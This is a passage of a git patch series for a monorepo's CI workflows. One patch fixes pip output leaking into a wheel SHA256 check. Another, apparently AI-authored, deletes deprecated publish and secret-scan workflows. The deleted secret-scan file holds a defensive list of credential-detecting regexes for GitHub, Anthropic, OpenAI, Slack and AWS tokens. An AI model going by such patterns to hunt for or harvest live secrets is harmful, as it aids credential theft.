From 84ffa2da6cf60c454ddf42fa13fad136aee9b170 Mon Sep 17 00:00:00 2001 From: claude-ceo-assistant Date: Sun, 10 May 2026 19:51:18 -0700 Subject: [PATCH 1/7] fix(ci): cascade wait-step SHA capture leaked pip stdout (4th defect) Run 5196 (2026-05-11 02:46Z, first-ever successful publish) succeeded the publish job but failed the cascade job at the wait-for-PyPI- propagation step: ::error::PyPI propagated 0.1.130 but wheel content SHA256 mismatch. ::error::Expected: 536b123816f3c7fb54690b80be482b28cabd1874690e9e93d8586af3864c7fba ::error::Got: Collecting molecule-ai-workspace-runtime==0.1.130 ::error::Fastly may be serving stale content. Refusing to fan out cascade. The 'Got:' is pip's own stdout, not a SHA. Root cause: HASH=$(python -m pip download ... 2>/dev/null && sha256sum ... | awk ...) The shell pipeline captures BOTH commands' stdout into $HASH. `2>/dev/null` only silences stderr, not stdout. pip download writes 'Collecting ...' to stdout by default, so it leaks into HASH ahead of sha256sum's output. Fix: split into two steps, redirect pip stdout to /dev/null explicitly, capture only sha256sum's output into HASH. Impact: cascade-to-8-template-repos failed, but PyPI publish itself succeeded. Users (workspace-template-* maintainers) can pin manually via 'docker build --build-arg RUNTIME_VERSION=X.Y.Z' until cascade is healed. hongming-pc is doing exactly this for the plugins_registry rollout. 4th and likely last workflow defect after #353, #355, #357. Refs: #351, #353, #355, #357, #348 Q3 --- .gitea/workflows/publish-runtime.yml | 24 +++++++++++++++++------- 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/.gitea/workflows/publish-runtime.yml b/.gitea/workflows/publish-runtime.yml index cefd9259..fe46e812 100644 --- a/.gitea/workflows/publish-runtime.yml +++ b/.gitea/workflows/publish-runtime.yml @@ -207,13 +207,23 @@ jobs: # Stage (b): download wheel + SHA256 compare against what we built. # Catches Fastly stale-content serving old bytes under a new version URL. - HASH=$(python -m pip download \ - --no-deps \ - --no-cache-dir \ - --dest /tmp/wheel-probe \ - "molecule-ai-workspace-runtime==${RUNTIME_VERSION}" \ - 2>/dev/null \ - && sha256sum /tmp/wheel-probe/*.whl | awk '{print $1}') + # + # Caught run 5196 (first-ever successful publish, 2026-05-11): the + # previous one-liner `HASH=$(pip download ... && sha256sum ...)` + # captured pip's stdout (`Collecting molecule-ai-workspace-runtime + # ==X.Y.Z`) into HASH, then the SHA comparison failed against the + # leaked `Collecting...` string. `2>/dev/null` silences stderr but + # NOT stdout; pip writes its progress to stdout by default. + # Fix: split into two steps, silence pip's stdout explicitly, capture + # only sha256sum's output into HASH. + python -m pip download \ + --no-deps \ + --no-cache-dir \ + --dest /tmp/wheel-probe \ + --quiet \ + "molecule-ai-workspace-runtime==${RUNTIME_VERSION}" \ + >/dev/null 2>&1 + HASH=$(sha256sum /tmp/wheel-probe/*.whl | awk '{print $1}') if [ "$HASH" != "$EXPECTED_SHA256" ]; then echo "::error::PyPI propagated $RUNTIME_VERSION but wheel content SHA256 mismatch." echo "::error::Expected: $EXPECTED_SHA256" From a0da162aeb9bab6bbd5cb11a968d5f2cac19181c Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:10:35 -0700 Subject: [PATCH 2/7] =?UTF-8?q?ci:=20delete=20.github/workflows/=20copies?= =?UTF-8?q?=20that=20are=20mirrored=20in=20.gitea/=20(RFC=20internal#219?= =?UTF-8?q?=20=C2=A71,=20Category=20A)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Sweep companion to PR#372 (ci.yml port). These two .github/workflows/ files have working .gitea/workflows/ twins active on Gitea Actions: - publish-runtime.yml — .gitea/ version is the canonical PyPI publisher (ported 2026-05-10 in issue #206). The .github/ version explicitly marks itself DEPRECATED in its own header comment and is kept "for reference only". The .gitea/ port drops OIDC trusted publisher, workflow_dispatch.inputs, merge_group, and the GitHub-only pypa/gh-action-pypi-publish action. - secret-scan.yml — .gitea/ version is the active branch-protection gate (matches "Secret scan / Scan diff for credential-shaped strings (pull_request)" required check name). The .github/ version retains a workflow_call entry point for reusable cross-repo invocation, but per saved memory feedback_gitea_cross_repo_uses_blocked cross-repo `uses:` is blocked on Gitea 1.22.6 anyway (DEFAULT_ACTIONS_URL=self), so the reusable shape no longer has callers. Both files are silently dead — verified by reading the molecule-core Gitea Actions page (only the 6 .gitea/ workflows appear in the workflow filter sidebar; none of the .github/ files have ever produced a run). Per RFC §1: this PR is a hygiene cleanup. Removing the dead .github/ copies eliminates the ongoing confusion of two workflow files claiming the same job name and converges molecule-core toward a single source of truth under .gitea/. Branch protection on main was checked and does NOT reference any removed file — only the .gitea/ secret-scan and sop-tier-check check names are required. DO NOT MERGE without orchestrator-dispatched Five-Axis review + @hongmingwang chat-go (per feedback_pr_review_via_other_agents). Cross-links: - RFC: molecule-ai/internal#219 - Companion: PR#372 (ci.yml port — Category C-style) Co-Authored-By: Claude Opus 4.7 (1M context) --- .github/workflows/publish-runtime.yml | 446 -------------------------- .github/workflows/secret-scan.yml | 214 ------------ 2 files changed, 660 deletions(-) delete mode 100644 .github/workflows/publish-runtime.yml delete mode 100644 .github/workflows/secret-scan.yml diff --git a/.github/workflows/publish-runtime.yml b/.github/workflows/publish-runtime.yml deleted file mode 100644 index 6118c113..00000000 --- a/.github/workflows/publish-runtime.yml +++ /dev/null @@ -1,446 +0,0 @@ -name: publish-runtime - -# DEPRECATED on Gitea Actions — this file is kept for reference only. -# Gitea Actions reads .gitea/workflows/, not .github/workflows/. -# The canonical version is now: .gitea/workflows/publish-runtime.yml -# That port: -# - Drops OIDC trusted publisher (Gitea has no environments/OIDC) -# - Uses PYPI_TOKEN secret instead of gh-action-pypi-publish -# - Uses ${GITHUB_REF#refs/tags/} instead of github.ref_name -# - Drops staging branch trigger (staging branch does not exist) -# - Drops merge_group trigger (Gitea has no merge queue) -# -# Publishes molecule-ai-workspace-runtime to PyPI from monorepo workspace/. -# Monorepo workspace/ is the only source-of-truth for runtime code; this -# workflow is the bridge from monorepo edits to the PyPI artifact that -# the 8 workspace-template-* repos depend on. -# -# Triggered by: -# - Pushing a tag matching `runtime-vX.Y.Z` (the version is derived from -# the tag — `runtime-v0.1.6` publishes `0.1.6`). -# - Manual workflow_dispatch with an explicit `version` input (useful for -# dev/test releases without tagging the repo). -# - Auto: any push to `staging` that touches `workspace/**`. The version -# is derived by querying PyPI for the current latest and bumping the -# patch component. This closes the human-in-loop gap that caused the -# 2026-04-27 RuntimeCapabilities ImportError outage — adapter symbol -# additions in workspace/adapters/base.py used to require an operator -# to remember to publish; now the merge itself triggers the publish. -# -# The workflow: -# 1. Runs scripts/build_runtime_package.py to copy workspace/ → -# build/molecule_runtime/ with imports rewritten (`a2a_client` → -# `molecule_runtime.a2a_client`). -# 2. Builds wheel + sdist with `python -m build`. -# 3. Publishes to PyPI via the PyPA Trusted Publisher action (OIDC). -# No static API token is stored — PyPI verifies the workflow's -# OIDC claim against the trusted-publisher config registered for -# molecule-ai-workspace-runtime (molecule-ai/molecule-core, -# publish-runtime.yml, environment pypi-publish). -# -# After publish: the 8 template repos pick up the new version on their -# next image rebuild (their requirements.txt pin -# `molecule-ai-workspace-runtime>=0.1.0`, so any new release is eligible). -# To force-pull immediately, bump the pin in each template repo's -# requirements.txt and merge — that triggers their own publish-image.yml. - -on: - push: - tags: - - "runtime-v*" - branches: - - staging - paths: - # Auto-publish when staging gets changes that affect what gets - # published. Path filter ONLY applies to branch pushes — tag pushes - # still fire regardless. - # - # workspace/** is the source-of-truth for runtime code. - # scripts/build_runtime_package.py is the build script — changes to - # it (e.g. a fix to the import rewriter or a manifest emit) directly - # affect what ships in the wheel even if no workspace/ file changes. - # The 2026-04-27 lib/ subpackage incident missed an auto-publish for - # exactly this reason — PR #2174 only changed scripts/ and the - # operator had to remember a manual dispatch. - - "workspace/**" - - "scripts/build_runtime_package.py" - workflow_dispatch: - inputs: - version: - description: "Version to publish (e.g. 0.1.6). Required for manual dispatch." - required: true - type: string - -permissions: - contents: read - -# Serialize publishes so two staging merges landing seconds apart don't -# both compute "latest+1" and race on PyPI upload. The second one waits. -concurrency: - group: publish-runtime - cancel-in-progress: false - -jobs: - publish: - runs-on: ubuntu-latest - environment: pypi-publish - permissions: - contents: read - id-token: write # PyPI Trusted Publisher (OIDC) — no PYPI_TOKEN needed - outputs: - version: ${{ steps.version.outputs.version }} - wheel_sha256: ${{ steps.wheel_hash.outputs.wheel_sha256 }} - steps: - - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - - - uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0 - with: - python-version: "3.11" - cache: pip - - - name: Derive version (tag, manual input, or PyPI auto-bump) - id: version - run: | - if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then - VERSION="${{ inputs.version }}" - elif echo "$GITHUB_REF_NAME" | grep -q "^runtime-v"; then - # Tag is `runtime-vX.Y.Z` — strip the prefix. - VERSION="${GITHUB_REF_NAME#runtime-v}" - else - # Auto-publish from staging push. Query PyPI for the current - # latest and bump the patch component. concurrency: group above - # serializes parallel staging merges so we don't race on the - # bump. If PyPI is unreachable, fail loud — better to skip a - # publish than to overwrite an existing version. - LATEST=$(curl -fsS --retry 3 https://pypi.org/pypi/molecule-ai-workspace-runtime/json \ - | python -c "import sys,json; print(json.load(sys.stdin)['info']['version'])") - MAJOR=$(echo "$LATEST" | cut -d. -f1) - MINOR=$(echo "$LATEST" | cut -d. -f2) - PATCH=$(echo "$LATEST" | cut -d. -f3) - VERSION="${MAJOR}.${MINOR}.$((PATCH+1))" - echo "Auto-bumped from PyPI latest $LATEST -> $VERSION" - fi - if ! echo "$VERSION" | grep -qE '^[0-9]+\.[0-9]+\.[0-9]+(\.dev[0-9]+|rc[0-9]+|a[0-9]+|b[0-9]+|\.post[0-9]+)?$'; then - echo "::error::version $VERSION does not match PEP 440" - exit 1 - fi - echo "version=$VERSION" >> "$GITHUB_OUTPUT" - echo "Publishing molecule-ai-workspace-runtime $VERSION" - - - name: Install build tooling - run: pip install build twine - - - name: Build package from workspace/ - run: | - python scripts/build_runtime_package.py \ - --version "${{ steps.version.outputs.version }}" \ - --out "${{ runner.temp }}/runtime-build" - - - name: Build wheel + sdist - working-directory: ${{ runner.temp }}/runtime-build - run: python -m build - - - name: Capture wheel SHA256 for cascade content-verification - # Recorded BEFORE upload so the cascade probe can verify the - # bytes Fastly serves under the new version's URL match what - # we built. Closes a hole left by #2197: that probe verified - # pip can resolve the version (catches propagation lag) but - # not that the wheel content matches (would silently pass a - # Fastly stale-content scenario where the new version's URL - # serves an old wheel binary). - id: wheel_hash - working-directory: ${{ runner.temp }}/runtime-build - run: | - set -eu - WHEEL=$(ls dist/*.whl 2>/dev/null | head -1) - if [ -z "$WHEEL" ]; then - echo "::error::No .whl in dist/ — `python -m build` must have failed silently" - exit 1 - fi - HASH=$(sha256sum "$WHEEL" | awk '{print $1}') - echo "wheel_sha256=${HASH}" >> "$GITHUB_OUTPUT" - echo "Local wheel SHA256 (pre-upload): ${HASH}" - echo "Wheel filename: $(basename "$WHEEL")" - - - name: Verify package contents (sanity) - working-directory: ${{ runner.temp }}/runtime-build - # Smoke logic lives in scripts/wheel_smoke.py so the same gate runs - # at both PR-time (runtime-prbuild-compat.yml) and publish-time - # (here). Splitting the smoke across two heredocs let them drift - # apart historically — one script keeps them locked. - run: | - python -m twine check dist/* - python -m venv /tmp/smoke - /tmp/smoke/bin/pip install --quiet dist/*.whl - /tmp/smoke/bin/python "$GITHUB_WORKSPACE/scripts/wheel_smoke.py" - - - name: Publish to PyPI (Trusted Publisher / OIDC) - # PyPI side is configured: project molecule-ai-workspace-runtime → - # publisher molecule-ai/molecule-core, workflow publish-runtime.yml, - # environment pypi-publish. The action mints a short-lived OIDC - # token and exchanges it for a PyPI upload credential — no static - # API token in this repo's secrets. - uses: pypa/gh-action-pypi-publish@cef221092ed1bacb1cc03d23a2d87d1d172e277b # release/v1 - with: - packages-dir: ${{ runner.temp }}/runtime-build/dist/ - - cascade: - # After PyPI accepts the upload, fan out a repository_dispatch to each - # template repo so they rebuild their image against the new runtime. - # Each template's `runtime-published.yml` receiver picks up the event, - # pulls the new PyPI version (their requirements.txt pin is `>=`), and - # republishes ghcr.io/molecule-ai/workspace-template-:latest. - # - # Soft-fail per repo: if one template's dispatch fails (perms missing, - # repo archived, etc.) we still try the others and surface the failures - # in the workflow summary instead of aborting the whole cascade. - needs: publish - runs-on: ubuntu-latest - steps: - - name: Wait for PyPI to propagate the new version - # PyPI accepts the upload, then takes a few seconds to make the - # new version visible across all THREE surfaces pip touches: - # 1. /pypi///json — metadata endpoint - # 2. /simple// — pip's primary download index - # 3. files.pythonhosted.org — CDN-fronted wheel binary - # Each has its own cache. The previous check polled only (1) - # and would let the cascade fire while (2) or (3) still served - # the previous version, so downstream `pip install` resolved - # to the old wheel. Docker layer cache then locked that stale - # resolution in for subsequent rebuilds (the cache trap that - # bit us five times in one night). - # - # Two-stage probe per poll: - # (a) `pip install --no-cache-dir PACKAGE==VERSION` — succeeds - # only when the version is resolvable. Catches surface (1) - # and (2) propagation lag. - # (b) `pip download` of the same wheel + SHA256 compare against - # the just-built dist's hash. Catches surface (3) lag AND - # Fastly serving stale content under the new version's URL - # (a separate Fastly-corruption mode that pip-install alone - # can't see, since pip install resolves+unpacks against - # whatever bytes Fastly returns and never inspects them). - # Both must pass before the cascade fans out. - # - # The venv is reused across polls; only `pip install`/`pip - # download` run in the loop, with --force-reinstall + - # --no-cache-dir so the previous poll's cached state doesn't - # mask propagation lag. - env: - RUNTIME_VERSION: ${{ needs.publish.outputs.version }} - EXPECTED_SHA256: ${{ needs.publish.outputs.wheel_sha256 }} - run: | - set -eu - if [ -z "$EXPECTED_SHA256" ]; then - echo "::error::publish job did not expose wheel_sha256 — cannot verify wheel content. Refusing to fan out cascade." - exit 1 - fi - python -m venv /tmp/propagation-probe - PROBE=/tmp/propagation-probe/bin - $PROBE/pip install --upgrade --quiet pip - # Poll budget: 30 attempts × (~3-5s pip install + ~3s pip - # download + 4s sleep) ≈ 5-6 min wall on a slow GH runner. - # Generous vs PyPI's typical few-seconds propagation; - # failures past this are signal of a real PyPI / Fastly - # issue, not just lag. - for i in $(seq 1 30); do - # Stage (a): can pip resolve and install the version? - if $PROBE/pip install \ - --quiet \ - --no-cache-dir \ - --force-reinstall \ - --no-deps \ - "molecule-ai-workspace-runtime==${RUNTIME_VERSION}" \ - >/dev/null 2>&1; then - INSTALLED=$($PROBE/pip show molecule-ai-workspace-runtime 2>/dev/null \ - | awk -F': ' '/^Version:/{print $2}') - if [ "$INSTALLED" = "$RUNTIME_VERSION" ]; then - # Stage (b): does Fastly serve the bytes we uploaded? - # `pip download` writes the actual .whl file to disk so - # we can sha256sum it (vs `pip install` which unpacks - # and discards). - rm -rf /tmp/probe-dl - mkdir -p /tmp/probe-dl - if $PROBE/pip download \ - --quiet \ - --no-cache-dir \ - --no-deps \ - --dest /tmp/probe-dl \ - "molecule-ai-workspace-runtime==${RUNTIME_VERSION}" \ - >/dev/null 2>&1; then - WHEEL=$(ls /tmp/probe-dl/*.whl 2>/dev/null | head -1) - if [ -n "$WHEEL" ]; then - ACTUAL=$(sha256sum "$WHEEL" | awk '{print $1}') - if [ "$ACTUAL" = "$EXPECTED_SHA256" ]; then - echo "::notice::✓ pip resolves AND wheel content matches after ${i} poll(s) (sha256=${EXPECTED_SHA256})" - exit 0 - fi - # Hash mismatch: PyPI accepted our upload but Fastly - # is serving different bytes under the version's URL. - # Most often this is propagation lag of the BINARY - # surface — the version is resolvable but the wheel - # cache hasn't caught up. Retry. - echo "::warning::poll ${i}: wheel content mismatch (got ${ACTUAL:0:12}…, want ${EXPECTED_SHA256:0:12}…) — Fastly likely still serving stale binary, retrying" - fi - fi - fi - fi - sleep 4 - done - echo "::error::pip never resolved molecule-ai-workspace-runtime==${RUNTIME_VERSION} with matching wheel content within ~5 min." - echo "::error::Expected wheel SHA256: ${EXPECTED_SHA256}" - echo "::error::Refusing to fan out cascade against stale or corrupt PyPI surfaces." - exit 1 - - - name: Fan out via push to .runtime-version - env: - # Gitea PAT with write:repository scope on the 8 cascade-active - # template repos. Used here for `git push` (NOT for an API - # dispatch — Gitea 1.22.6 has no repository_dispatch endpoint; - # empirically verified across 6 candidate paths in molecule- - # core#20 issuecomment-913). The push trips each template's - # existing `on: push: branches: [main]` trigger on - # publish-image.yml, which then reads the updated - # .runtime-version via its resolve-version job. - DISPATCH_TOKEN: ${{ secrets.DISPATCH_TOKEN }} - RUNTIME_VERSION: ${{ needs.publish.outputs.version }} - run: | - set +e # don't abort on a single repo failure — collect them all - - # Soft-skip on workflow_dispatch when the token is missing - # (operator ad-hoc test); hard-fail on push so unattended - # publishes can't silently skip the cascade. Same shape as - # the original v1, intentional split per the schedule-vs- - # dispatch hardening 2026-04-28. - if [ -z "$DISPATCH_TOKEN" ]; then - if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then - echo "::warning::DISPATCH_TOKEN secret not set — skipping cascade." - echo "::warning::set it at Settings → Secrets and Variables → Actions, then rerun. Templates will stay on the prior runtime version until either this token is set or each template is rebuilt manually." - exit 0 - fi - echo "::error::DISPATCH_TOKEN secret missing — cascade cannot fan out." - echo "::error::PyPI was published, but the 8 template repos will NOT pick up the new version until this token is restored and a republish dispatches the cascade." - echo "::error::set it at Settings → Secrets and Variables → Actions; then re-trigger publish-runtime via workflow_dispatch." - exit 1 - fi - VERSION="$RUNTIME_VERSION" - if [ -z "$VERSION" ]; then - echo "::error::publish job did not expose a version output — cascade cannot fan out" - exit 1 - fi - - # All 9 workspace templates declared in manifest.json. The list - # MUST stay aligned with manifest.json's workspace_templates — - # cascade-list-drift-gate.yml enforces this in CI per the - # codex-stuck-on-stale-runtime invariant from PR #2556. - # Long-term goal: derive this list from manifest.json so it - # can't drift even on a manifest edit (RFC #388 Phase-1). - # - # Per-template publish-image.yml presence is checked at - # cascade-time below: codex doesn't ship one today, so the - # cascade soft-skips it with an informational message rather - # than dropping it from this list (which would re-introduce - # the drift the gate exists to catch). - GITEA_URL="${GITEA_URL:-https://git.moleculesai.app}" - TEMPLATES="claude-code hermes openclaw codex langgraph crewai autogen deepagents gemini-cli" - FAILED="" - SKIPPED="" - - # Configure git identity once. The persona owning DISPATCH_TOKEN - # is the same identity that authored this commit on each - # template; using a generic "publish-runtime cascade" co-author - # trailer in the message keeps the audit trail honest about the - # workflow-driven origin. - git config --global user.name "publish-runtime cascade" - git config --global user.email "publish-runtime@moleculesai.app" - - WORKDIR="$(mktemp -d)" - for tpl in $TEMPLATES; do - REPO="molecule-ai/molecule-ai-workspace-template-$tpl" - CLONE="$WORKDIR/$tpl" - - # Pre-check: skip templates without a publish-image.yml. - # The cascade's job is to trip the template's on-push - # rebuild — if there's no rebuild workflow, pushing a - # .runtime-version commit is just noise on the target - # repo. Use the Gitea contents API (no clone required for - # the probe). 200 = present; 404 = absent. - HTTP=$(curl -sS -o /dev/null -w "%{http_code}" \ - -H "Authorization: token $DISPATCH_TOKEN" \ - "$GITEA_URL/api/v1/repos/$REPO/contents/.github/workflows/publish-image.yml") - if [ "$HTTP" = "404" ]; then - echo "↷ $tpl has no publish-image.yml — soft-skip (informational; manifest still tracks it)" - SKIPPED="$SKIPPED $tpl" - continue - fi - if [ "$HTTP" != "200" ]; then - echo "::warning::$tpl publish-image.yml probe returned HTTP $HTTP — proceeding anyway, push will surface the real failure if any" - fi - - # Use a per-template attempt loop so a transient race (e.g. - # human pushing to the same template at the same instant) - # doesn't lose the cascade. Bounded retries (3) — beyond - # that we surface the failure and let the operator retry. - attempt=0 - success=false - while [ $attempt -lt 3 ]; do - attempt=$((attempt + 1)) - rm -rf "$CLONE" - if ! git clone --depth=1 \ - "https://x-access-token:${DISPATCH_TOKEN}@${GITEA_URL#https://}/$REPO.git" \ - "$CLONE" >/tmp/clone.log 2>&1; then - echo "::warning::clone $tpl attempt $attempt failed: $(tail -n3 /tmp/clone.log)" - sleep 2 - continue - fi - - cd "$CLONE" - echo "$VERSION" > .runtime-version - - # Idempotency guard: if the file already matches, this - # publish is a re-run for a version already cascaded. - # Don't push a no-op commit (would spuriously re-trip the - # template's on-push and rebuild for nothing). - if git diff --quiet -- .runtime-version; then - echo "✓ $tpl already at $VERSION — no commit needed (idempotent)" - success=true - cd - >/dev/null - break - fi - - git add .runtime-version - git commit -m "chore: pin runtime to $VERSION (publish-runtime cascade)" \ - -m "Co-Authored-By: publish-runtime cascade " \ - >/dev/null - - if git push origin HEAD:main >/tmp/push.log 2>&1; then - echo "✓ $tpl pushed $VERSION on attempt $attempt" - success=true - cd - >/dev/null - break - fi - - # Likely a non-fast-forward — pull-rebase and retry. - # Don't force-push: that would silently overwrite a racing - # human/cascade commit. - echo "::warning::push $tpl attempt $attempt failed, pull-rebasing: $(tail -n3 /tmp/push.log)" - git pull --rebase origin main >/tmp/rebase.log 2>&1 || true - cd - >/dev/null - done - - if [ "$success" != "true" ]; then - FAILED="$FAILED $tpl" - fi - done - rm -rf "$WORKDIR" - - if [ -n "$FAILED" ]; then - echo "::error::Cascade incomplete after 3 retries each. Failed templates:$FAILED" - echo "::error::PyPI publish succeeded; failed templates lag the new version. Re-run this workflow_dispatch with the same version to retry only the laggers (idempotent — already-cascaded templates skip)." - exit 1 - fi - if [ -n "$SKIPPED" ]; then - echo "Cascade complete: pinned $VERSION on cascade-active templates. Soft-skipped (no publish-image.yml):$SKIPPED" - else - echo "Cascade complete: $VERSION pinned across all manifest workspace_templates." - fi diff --git a/.github/workflows/secret-scan.yml b/.github/workflows/secret-scan.yml deleted file mode 100644 index edea6bf9..00000000 --- a/.github/workflows/secret-scan.yml +++ /dev/null @@ -1,214 +0,0 @@ -name: Secret scan - -# Hard CI gate. Refuses any PR / push whose diff additions contain a -# recognisable credential. Defense-in-depth for the #2090-class incident -# (2026-04-24): GitHub's hosted Copilot Coding Agent leaked a ghs_* -# installation token into tenant-proxy/package.json via `npm init` -# slurping the URL from a token-embedded origin remote. We can't fix -# upstream's clone hygiene, so we gate here. -# -# Also the canonical reusable workflow for the rest of the org. Other -# Molecule-AI repos enroll with a single 3-line workflow: -# -# jobs: -# secret-scan: -# uses: molecule-ai/molecule-core/.github/workflows/secret-scan.yml@staging -# -# Pin to @staging not @main — staging is the active default branch, -# main lags via the staging-promotion workflow. Updates ride along -# automatically on the next consumer workflow run. -# -# Same regex set as the runtime's bundled pre-commit hook -# (molecule-ai-workspace-runtime: molecule_runtime/scripts/pre-commit-checks.sh). -# Keep the two sides aligned when adding patterns. - -on: - pull_request: - types: [opened, synchronize, reopened] - push: - branches: [main, staging] - # Required for GitHub merge queue: the queue's pre-merge CI run on - # `gh-readonly-queue/...` refs needs this check to fire so the queue - # gets a real result instead of stalling forever AWAITING_CHECKS. - merge_group: - types: [checks_requested] - # Reusable workflow entry point for other Molecule-AI repos. - workflow_call: - -jobs: - scan: - name: Scan diff for credential-shaped strings - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 - with: - fetch-depth: 2 # need previous commit to diff against on push events - - # For pull_request events the diff base may be many commits behind - # HEAD and absent from the shallow clone. Fetch it explicitly. - - name: Fetch PR base SHA (pull_request events only) - if: github.event_name == 'pull_request' - run: git fetch --depth=1 origin ${{ github.event.pull_request.base.sha }} - - # For merge_group events the queue's pre-merge ref is a commit on - # `gh-readonly-queue/...` whose parent is the queue's base_sha. - # That parent isn't part of the queue branch's shallow clone, so - # we fetch it explicitly. Without this the diff falls through to - # "no BASE → scan entire tree" mode and false-positives on legit - # test fixtures (e.g. canvas/src/lib/validation/__tests__/secret-formats.test.ts). - - name: Fetch merge_group base SHA (merge_group events only) - if: github.event_name == 'merge_group' - run: git fetch --depth=1 origin ${{ github.event.merge_group.base_sha }} - - - name: Refuse if credential-shaped strings appear in diff additions - env: - # Plumb event-specific SHAs through env so the script doesn't - # need conditional `${{ ... }}` interpolation per event type. - # github.event.before/after only exist on push events; - # merge_group has its own base_sha/head_sha; pull_request has - # pull_request.base.sha / pull_request.head.sha. - PR_BASE_SHA: ${{ github.event.pull_request.base.sha }} - PR_HEAD_SHA: ${{ github.event.pull_request.head.sha }} - MG_BASE_SHA: ${{ github.event.merge_group.base_sha }} - MG_HEAD_SHA: ${{ github.event.merge_group.head_sha }} - PUSH_BEFORE: ${{ github.event.before }} - PUSH_AFTER: ${{ github.event.after }} - run: | - # Pattern set covers GitHub family (the actual #2090 vector), - # Anthropic / OpenAI / Slack / AWS. Anchored on prefixes with low - # false-positive rates against agent-generated content. Mirror of - # molecule-ai-workspace-runtime/molecule_runtime/scripts/pre-commit-checks.sh - # — keep aligned. - SECRET_PATTERNS=( - 'ghp_[A-Za-z0-9]{36,}' # GitHub PAT (classic) - 'ghs_[A-Za-z0-9]{36,}' # GitHub App installation token - 'gho_[A-Za-z0-9]{36,}' # GitHub OAuth user-to-server - 'ghu_[A-Za-z0-9]{36,}' # GitHub OAuth user - 'ghr_[A-Za-z0-9]{36,}' # GitHub OAuth refresh - 'github_pat_[A-Za-z0-9_]{82,}' # GitHub fine-grained PAT - 'sk-ant-[A-Za-z0-9_-]{40,}' # Anthropic API key - 'sk-proj-[A-Za-z0-9_-]{40,}' # OpenAI project key - 'sk-svcacct-[A-Za-z0-9_-]{40,}' # OpenAI service-account key - 'sk-cp-[A-Za-z0-9_-]{60,}' # MiniMax API key (F1088 vector — caught only after the fact) - 'xox[baprs]-[A-Za-z0-9-]{20,}' # Slack tokens - 'AKIA[0-9A-Z]{16}' # AWS access key ID - 'ASIA[0-9A-Z]{16}' # AWS STS temp access key ID - ) - - # Determine the diff base. Each event type stores its SHAs in - # a different place — see the env block above. - case "${{ github.event_name }}" in - pull_request) - BASE="$PR_BASE_SHA" - HEAD="$PR_HEAD_SHA" - ;; - merge_group) - BASE="$MG_BASE_SHA" - HEAD="$MG_HEAD_SHA" - ;; - *) - BASE="$PUSH_BEFORE" - HEAD="$PUSH_AFTER" - ;; - esac - - # On push events with shallow clones, BASE may be present in - # the event payload but absent from the local object DB - # (fetch-depth=2 doesn't always reach the previous commit - # across true merges). Try fetching it on demand. If the - # fetch fails — e.g. the SHA was force-overwritten — we fall - # through to the empty-BASE branch below, which scans the - # entire tree as if every file were new. Correct, just slow. - if [ -n "$BASE" ] && ! echo "$BASE" | grep -qE '^0+$'; then - if ! git cat-file -e "$BASE" 2>/dev/null; then - git fetch --depth=1 origin "$BASE" 2>/dev/null || true - fi - fi - - # Files added or modified in this change. - if [ -z "$BASE" ] || echo "$BASE" | grep -qE '^0+$' || ! git cat-file -e "$BASE" 2>/dev/null; then - # New branch / no previous SHA / BASE unreachable — check the - # entire tree as added content. Slower, but correct on first - # push. - CHANGED=$(git ls-tree -r --name-only HEAD) - DIFF_RANGE="" - else - CHANGED=$(git diff --name-only --diff-filter=AM "$BASE" "$HEAD") - DIFF_RANGE="$BASE $HEAD" - fi - - if [ -z "$CHANGED" ]; then - echo "No changed files to inspect." - exit 0 - fi - - # Self-exclude: this workflow file legitimately contains the - # pattern strings as regex literals. Without an exclude it would - # block its own merge. - SELF=".github/workflows/secret-scan.yml" - - OFFENDING="" - # `while IFS= read -r` (not `for f in $CHANGED`) so filenames - # containing whitespace don't word-split silently — a path - # with a space would otherwise produce two iterations on - # tokens that aren't real filenames, breaking the - # self-exclude + diff lookup. - while IFS= read -r f; do - [ -z "$f" ] && continue - [ "$f" = "$SELF" ] && continue - if [ -n "$DIFF_RANGE" ]; then - ADDED=$(git diff --no-color --unified=0 "$BASE" "$HEAD" -- "$f" 2>/dev/null | grep -E '^\+[^+]' || true) - else - # No diff range (new branch first push) — scan the full file - # contents as if every line were new. - ADDED=$(cat "$f" 2>/dev/null || true) - fi - [ -z "$ADDED" ] && continue - for pattern in "${SECRET_PATTERNS[@]}"; do - if echo "$ADDED" | grep -qE "$pattern"; then - OFFENDING="${OFFENDING}${f} (matched: ${pattern})\n" - break - fi - done - done <<< "$CHANGED" - - if [ -n "$OFFENDING" ]; then - echo "::error::Credential-shaped strings detected in diff additions:" - # `printf '%b' "$OFFENDING"` interprets backslash escapes - # (the literal `\n` we appended above becomes a newline) - # WITHOUT treating OFFENDING as a format string. Plain - # `printf "$OFFENDING"` is a format-string sink: a filename - # containing `%` would be interpreted as a conversion - # specifier, corrupting the error message (or printing - # `%(missing)` artifacts). - printf '%b' "$OFFENDING" - echo "" - echo "The actual matched values are NOT echoed here, deliberately —" - echo "round-tripping a leaked credential into CI logs widens the blast" - echo "radius (logs are searchable + retained)." - echo "" - echo "Recovery:" - echo " 1. Remove the secret from the file. Replace with an env var" - echo " reference (e.g. \${{ secrets.GITHUB_TOKEN }} in workflows," - echo " process.env.X in code)." - echo " 2. If the credential was already pushed (this PR's commit" - echo " history reaches a public ref), treat it as compromised —" - echo " ROTATE it immediately, do not just remove it. The token" - echo " remains valid in git history forever and may be in any" - echo " log/cache that consumed this branch." - echo " 3. Force-push the cleaned commit (or stack a revert) and" - echo " re-run CI." - echo "" - echo "If the match is a false positive (test fixture, docs example," - echo "or this workflow's own regex literals): use a clearly-fake" - echo "placeholder like ghs_EXAMPLE_DO_NOT_USE that doesn't satisfy" - echo "the length suffix, OR add the file path to the SELF exclude" - echo "list in this workflow with a short reason." - echo "" - echo "Mirror of the regex set lives in the runtime's bundled" - echo "pre-commit hook (molecule-ai-workspace-runtime:" - echo "molecule_runtime/scripts/pre-commit-checks.sh) — keep aligned." - exit 1 - fi - - echo "✓ No credential-shaped strings in this change." From f0745619d252b023dff8da6eb5b4145fa1a86fb4 Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:12:29 -0700 Subject: [PATCH 